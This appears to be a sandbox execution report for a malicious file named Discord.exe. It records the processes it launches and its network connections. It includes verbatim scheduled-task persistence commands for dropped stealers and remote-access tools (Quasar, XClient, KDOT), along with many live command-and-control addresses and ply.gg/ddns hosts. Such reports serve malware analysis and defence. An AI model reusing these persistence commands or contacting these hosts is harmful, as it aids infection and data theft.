"C:\Users\Admin\Desktop\Files\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gM7yqR5MXayd.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qaFVyoxPIEUe.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YPe0OYzvdTtm.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uLv2aTQc0OcY.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwvStCtpEqoJ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j1goxeU1EauG.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOhLQcJh0MZU.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rTQ5Dc2zbKug.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 209.38.221.184:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 46.235.26.83:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 89.110.69.103:80 89.110.69.103 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
CN 150.158.33.10:50003 tcp
HK 156.245.12.57:8000 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
VN 14.243.221.170:3322 tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.28.185.29:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
NL 206.166.251.4:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:1504 tcp
US 73.62.14.5:4782 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
N/A 127.0.0.1:1504 tcp
KR 152.67.212.187:443 tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
FR 51.159.4.50:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
VN 14.243.221.170:3322 tcp
DE 167.235.70.96:8080 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 194.164.198.113:8080 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 fivexx5ht.top udp
TR 94.156.177.33:80 tcp
CN 112.124.28.233:5566 tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 66.45.226.53:7777 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 3.70.228.168:555 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 66.45.226.53:7777 tcp
DE 185.218.125.157:21441 tcp
KR 152.67.212.187:443 tcp
US 73.62.14.5:4782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
GB 132.145.17.167:9090 132.145.17.167 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
TR 94.156.177.33:80 tcp
US 104.20.4.235:443 pastebin.com tcp
CN 101.200.220.118:8090 tcp
HK 117.18.7.76:3782 tcp
DE 209.38.221.184:8080 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 46.235.26.83:8080 tcp
N/A 127.0.0.1:1504 tcp
US 66.45.226.53:7777 tcp
DE 3.70.228.168:555 tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.28.185.29:80 tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
N/A 127.0.0.1:1504 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.20.4.235:443 pastebin.com tcp
NL 206.166.251.4:8080 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 66.45.226.53:7777 tcp
US 73.62.14.5:4782 tcp
